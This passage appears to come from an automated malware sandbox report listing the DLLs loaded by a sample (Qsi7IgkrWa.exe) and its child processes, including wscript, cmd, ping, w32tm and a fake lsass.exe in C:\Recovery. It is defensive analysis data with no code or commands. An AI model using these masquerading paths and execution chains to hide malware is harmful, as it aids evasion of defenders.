                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: version.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Recovery\lsass.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: version.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ktmw32.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasapi32.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasman.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rtutils.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: mswsock.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: winhttp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: iphlpapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dnsapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: winnsi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasadhlp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: propsys.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dlnashext.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wpdshext.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: edputil.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: urlmon.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: iertutil.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: srvcli.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: netutils.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wintypes.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: appresolver.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: bcp47langs.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: slc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: userenv.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: sppc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: version.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ktmw32.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasapi32.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasman.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rtutils.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: mswsock.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: winhttp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: iphlpapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dnsapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: winnsi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasadhlp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: propsys.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dlnashext.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wpdshext.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: edputil.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: urlmon.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: iertutil.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: srvcli.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: netutils.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wintypes.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: appresolver.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: bcp47langs.dll
